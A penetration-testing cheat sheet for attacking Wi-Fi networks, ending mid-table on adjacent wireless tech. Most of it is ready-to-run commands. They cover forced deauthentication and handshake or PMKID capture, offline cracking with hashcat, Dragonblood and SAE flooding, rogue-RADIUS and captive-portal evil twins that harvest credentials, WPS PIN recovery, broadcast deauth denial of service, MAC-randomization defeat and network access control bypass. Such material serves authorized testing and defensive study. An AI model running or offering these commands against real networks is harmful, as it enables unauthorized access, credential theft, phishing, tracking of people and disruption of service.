Wireless / 802.11 — Offensive Testing Methodology
Quick Workflow
- Pick the right adapter (monitor mode + injection + correct band/PHY for target)
- Recon airspace passively — never deauth before you know the topology
- Choose attack: handshake capture, PMKID, evil twin, KARMA, or WPS
- Crack offline; do not rely on online dictionary attacks
- If WPA-Enterprise, pivot through stolen creds or rogue RADIUS
Hardware & Adapter Selection
| Chipset | Strengths | Notes |
|---|---|---|
| Atheros AR9271 (Alfa AWUS036NHA) | Solid 2.4 GHz monitor + injection | 802.11n only |
| Realtek RTL8812AU (AWUS036ACH) | Dual-band, injection | Driver: aircrack-ng/rtl8812au |
| MediaTek MT7612U (AWUS036ACM) | Stable dual-band | Modern kernels in-tree |
| MediaTek MT7921AU | Wi-Fi 6 monitor (limited) | Patched drivers required |
| AWUS036AXML / AXM | Wi-Fi 6E (6 GHz) | Bleeding edge — verify per release |
# Verify monitor + injection
sudo airmon-ng check kill
sudo airmon-ng start wlan0
sudo aireplay-ng --test wlan0mon
iw list | grep -A 8 "Supported interface modes"
Reconnaissance
# Multi-channel discovery (all bands)
sudo airodump-ng wlan0mon --band abg
# Targeted on a known channel/BSSID
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w cap wlan0mon
# Hidden SSID — wait for client probe or force deauth
sudo airodump-ng -c 6 --essid-regex "." wlan0mon
# Wigle / Kismet for war-driving
kismet -c wlan0mon
Key data to record: BSSID, ESSID, channel, encryption, PMF status, client list, RSSI, vendor OUI.
WPA / WPA2-PSK
Four-way Handshake Capture
# Targeted capture
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon
# Force a reconnect (deauth one client, do not blanket the AP)
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
Verify the EAPOL frames are usable:
hcxpcapngtool -o hash.hc22000 handshake-01.cap
PMKID (No Client Required)
PMKID lives in the first AP-to-station message — you can grab it without anyone connected.
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng \
--enable_status=1 --filterlist_ap=targets.txt --filtermode=2
hcxpcapngtool -o hash.hc22000 pmkid.pcapng
Cracking
# GPU dictionary attack
hashcat -m 22000 hash.hc22000 wordlist.txt -r rules/OneRuleToRuleThemAll.rule
# Mask attack (e.g. carrier defaults: 10 digits)
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d?d?d
# Known SSID-based defaults (e.g. UPC, Sky, BTHub generators)
upc_keys ESSID | hashcat -m 22000 hash.hc22000 -
WPA3 / SAE
Transition-Mode Downgrade
If the AP advertises both WPA2 and WPA3 (transition mode), force clients onto WPA2 by spoofing an RSN-only beacon and capturing as PSK.
Dragonblood (CVE-2019-9494/9495/13377)
Side-channel and downgrade attacks on SAE. Older hostapd (<2.10) with insufficient curve diversification leaks password elements via timing/cache attacks.
# Reference implementation
git clone https://github.com/vanhoefm/dragonblood
python3 dragondrain.py wlan0mon AA:BB:CC:DD:EE:FF
python3 dragontime.py --bssid AA:BB:CC:DD:EE:FF --iface wlan0mon
SAE Auth Flooding (Resource Exhaustion)
sudo mdk4 wlan0mon a -a AA:BB:CC:DD:EE:FF -m -s 1024
# Triggers heavy crypto on AP CPU; can DoS lower-end deployments
WPA-Enterprise (802.1X / EAP)
Method Identification
# Watch initial EAP-Request/Identity to fingerprint method
tshark -i wlan0mon -Y "eapol || eap" -V
| Inner Method | Attack |
|---|---|
| EAP-MSCHAPv2 (PEAP/TTLS) | Crack NetNTLMv1-style challenge offline |
| EAP-GTC | Cleartext password — capture via rogue RADIUS |
| EAP-TLS | Steal client cert (often in user keychain / DPAPI / NDES) |
| EAP-PWD | Dragonblood-class side channels |
Evil-Twin RADIUS (MSCHAPv2 / GTC)
# eaphammer — automated rogue AP + RADIUS
eaphammer -i wlan0 --essid CorpWiFi --bssid AA:BB:CC:DD:EE:FF \
--auth wpa-eap --creds
# Captured hashes → asleap or hashcat -m 5500
asleap -C challenge -R response -W wordlist.txt
Critical: organizations that don't pin server cert + CN on supplicants are vulnerable. Win10/11 with ServerValidation disabled (common for BYOD) will hand over creds.
EAP-TLS Cert Theft Paths
- DPAPI master key + cert blob from user profile (
%APPDATA%\Microsoft\SystemCertificates) - NDES misconfig (ESC8-class cert request abuse)
- ADCS user auto-enrollment template with weak ACL
WPS
Pixie Dust (Offline)
# Capture WPS exchange
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -K 1 -vvv
# Or
bully -b AA:BB:CC:DD:EE:FF -d -v 3 wlan0mon
Vulnerable chipsets: Ralink, Realtek, Broadcom (older firmware), MediaTek (specific revs). Pixiewps recovers PIN in seconds when nonces are predictable.
Online PIN Brute (Last Resort)
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -L -N -d 15 -t 30 -T .5 -r 3:30
# Most modern APs lock out after a few failures — slow and noisy
Evil Twin / KARMA / Mana
Stock Evil Twin (Captive Portal)
# wifiphisher — automated AP + phishing portal
sudo wifiphisher --essid CorpWiFi --noextensions --force-hostapd
# airgeddon — interactive menu (good for one-off engagements)
sudo airgeddon
KARMA / Mana (Probe Exploitation)
Older stations broadcast PNL (Preferred Network List) probes. KARMA replies "yes" to anything; Mana picks one realistic ESSID and answers consistently to defeat MAC randomization.
# hostapd-mana
sudo hostapd-mana ./mana.conf
# Combine with rogue RADIUS for enterprise nets
eaphammer -i wlan0 --known-beacons --known-ssids-file ssids.txt \
--auth wpa-eap --creds --hostile-portal
MAC Randomization Defeat
iOS/Android randomize MACs but leak per-SSID stable IDs. Cluster probes by sequence number and timing to re-identify devices.
KRACK & FragAttacks
| Attack | Class | Target |
|---|---|---|
| KRACK (CVE-2017-13077..082) | Key reinstallation | Unpatched WPA2 supplicants |
| FragAttacks (CVE-2020-24586..588) | Fragmentation/aggregation | Most pre-2021 implementations |
Test a network's patch status:
# Vanhoef test scripts
git clone https://github.com/vanhoefm/krackattacks-scripts
./krack-test-client.py
git clone https://github.com/vanhoefm/fragattacks
./test-fragattacks.py wlan0
Deauth / Disassociation Attacks
# Single client deauth (use for handshake capture)
aireplay-ng --deauth 3 -a AP -c CLIENT wlan0mon
# Broadcast (DoS — only with explicit authorization)
mdk4 wlan0mon d -B target_bssids.txt
# Disassoc + auth flood combo (kicks then prevents reconnect)
mdk4 wlan0mon a -a AP_BSSID -m
802.11w (PMF) blocks unencrypted deauth. Most modern enterprise APs require it. Clients without PMF support are still kickable via Action frames.
802.1X / Wired NAC Bypass (Adjacent)
# Sniff valid 802.1X exchange on wired side
tcpdump -i eth0 -w nac.pcap ether proto 0x888e
# silentbridge / nac_bypass — transparently bridge through an authenticated host
git clone https://github.com/s0lst1c3/silentbridge
silentbridge --takeover --phy wlan0 # variants for wired
Wi-Fi 6 / 6E / 7 Considerations
- 6 GHz (Wi-Fi 6E) disables WPA2-only; WPA3 + PMF mandatory. Many attacks are mitigated by spec.
- OFDMA / MU-MIMO: legacy injection often misaligns with RU allocations — verify packet delivery on test bench.
- TWT (Target Wake Time): deauth windows differ; observe BA sessions before injecting.
- MLO (Wi-Fi 7): a single client over multiple links — capture must cover all links to recover full session.
Sidebands & Adjacent Wireless
| Tech | Tool | Notes |
|---|---|---|
| Bluetooth Classic | redfang, crackle, btproxy | LMP/L2CAP fuzzing |
| BLE | bettercap, Sniffle (TI CC1352), Frontline | GATT enumeration, LE Secure Connections downgrade |
| Zigbee / 802. |